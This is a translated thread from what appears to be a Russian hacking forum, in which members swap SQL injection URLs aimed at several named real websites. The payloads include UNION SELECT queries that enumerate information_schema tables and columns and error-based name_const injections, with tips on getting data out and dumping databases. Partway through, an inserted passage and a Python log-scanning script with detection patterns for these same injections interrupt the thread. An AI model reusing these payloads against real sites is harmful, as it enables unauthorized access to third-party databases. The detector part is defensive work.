Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,444
    Likes Received:
    762
    Reputations:
    834
    You can use it as a blind injection.
     
    _________________________
  2. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    http://venec.ulstu.ru/lib/go.php?id=2151-9999999.9+union+select+1,2,3,4,5,6,7,8,9,12313212,11,12,13,14,15,16,17,18,19,20,21,22--+
    Only it didn't output anything(
     
    #19922 Ereee, 24 Mar 2012
    Last edited: 24 Mar 2012
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    Damn,
    and here http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404+limit+0,0+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+information_schema.tables--+

    why doesn't it output the tables?
     
  4. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404-9999.9+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+information_schema.tables+limit+0,1--+d

    Of course, you did limit 0,0.
     
    1 person likes this.
  5. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    952
    Likes Received:
    785
    Reputations:
    591
    http://venec.ulstu.ru/lib/go.php?id=21511111111111+UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex%28hex%28version%28%29%29%29,11,12,13,14,15,16,17,18,19,20,21,22--


    no?
     
    _________________________
    3 people like this.
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    you're such a brain)))
    and here

    http://www.fanfics.ru/read.php?id=3&chapter=-616'

    there is an error, but whatever I substitute, it disappears. What should I do?
     
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    952
    Likes Received:
    785
    Reputations:
    591

    What output is there? Or am I going blind?
     
    _________________________
    2 people like this.
  8. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    140
    Likes Received:
    40
    Reputations:
    26
    The output is fine: '5.1.45'
     
    1 person likes this.
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    I don't get where you found the output there. I had none before and I still have none.
     
  10. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    616
    Likes Received:
    203
    Reputations:
    293
    Delete the spaces))

     
    2 people like this.
  11. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,581
    Likes Received:
    425
    Reputations:
    231
    [​IMG]
     
    1 person likes this.
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Because the SQL injection there is not in a GET parameter but in the URI:

    http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1

    Look closely at the request, and there is output anyway, magic!!11

    And you, apparently, are using FF, which URL-encodes requests. Use another browser, or install the patch for FF (https://rdot.org/forum/showthread.php?t=1403)
     
    3 people like this.
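
The post above notes that the injected text sits in the URI rather than in a named GET parameter, and that some clients URL-encode the request while others send it raw. As an added example (not part of the thread), here is a defender-side check for access logs that normalises both forms before matching the query shapes quoted in this thread; the rule names, sample request lines and paths are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Patterns for the query shapes quoted in this thread, applied after normalisation.
RULES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?[\s(]+select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "name_const": re.compile(r"\bname_const\s*\("),
    "db_function": re.compile(r"\b(?:version|database|user)\s*\(\s*\)"),
    "quote_then_sql": re.compile(r"'\s*(?:and|or|union|order|limit)\b"),
}

def normalise(target, max_rounds=3):
    """Undo URL-encoding (including double encoding), case and inline comments."""
    text = target
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text.lower(), flags=re.S)
    return re.sub(r"\s+", " ", text)

def classify(request_line):
    """Return the sorted rule names matched by the whole request target."""
    parts = request_line.split(" ")
    # Scan path + raw query as one string: the payload may sit outside any
    # named parameter, so per-parameter parsing would miss it.
    target = " ".join(parts[1:-1]) if len(parts) >= 3 else request_line
    return sorted(n for n, rx in RULES.items() if rx.search(normalise(target)))

def scan(lines):
    """Map each flagged request line to the rules it matched."""
    return {line: hits for line in lines if (hits := classify(line))}

# Constructed sample request lines (not real traffic); paths are placeholders.
SAMPLE_REQUESTS = [
    "GET /item.php?id=10 HTTP/1.1",
    "GET /item.php?id=10+union+select+1,2,version()--+ HTTP/1.1",
    "GET /item.php?id=10%27%20UNION%2F%2A%2A%2FSELECT%201%2Ctable_name"
    "%20FROM%20information_schema.tables HTTP/1.1",
    "GET /read.php?id=3&'and(name_const(version(),1))='1 HTTP/1.1",
    "GET /search.php?q=student+union+election HTTP/1.1",
    "GET /item.php?id=10%2527+order+by+13--+- HTTP/1.1",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(hits, line)
```

Keyword matching of this kind is a triage signal for logs, not a substitute for parameterised queries in the application.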
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    Exactly, it opens fine in Opera. The only trouble is that I dump databases through my own PHP scripts, and just like FF they don't want to output things properly. Maybe there is some solution?

    And one more question right away: it outputs the tables fine, but not the columns

    http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+

    How do I output them?
     
  14. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    520
    Likes Received:
    105
    Reputations:
    53
    http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+

    Reading your questions, in 70% of cases your problem is yourself and the fact that you don't try to solve the problem on your own. If you want to learn something, first try to figure it out.
     
    #19934 Melfis, 24 Mar 2012
    Last edited: 24 Mar 2012
    1 person likes this.
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Everything is output, remove the WHERE =\
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,444
    Likes Received:
    762
    Reputations:
    834
    After 'where' you need to add table_name=0x[hex value of the table being output]+limit+0,1+--+
     
    _________________________
  17. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Will anyone answer my question?
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,139
    Reputations:
    886
    Who is this thread for?

    There is a sea of links there
     
    _________________________
  19. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    http://site.com/about.php?page='

    Is that an SQL vuln?

    Well, for now I don't want to post the link over the internet, but can you help me a little to find the tables? I tried so many ways but can't get a working method...

    My tries:
    Code:
    http://site.com/about.php?page=')+order+by+13--+-
    http://site.com/about.php?page='+order+by+13--+-
    http://site.com/about.php?page=' order by 13
    But there is no change...
    Any ideas?

    BTW I'm sorry about the language, but if I use Google Translate, it would be awful for all of us...
     
    1 person likes this.
  20. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Yes, this is sql-injection, but in LIMIT. You can't exploit this vuln.
     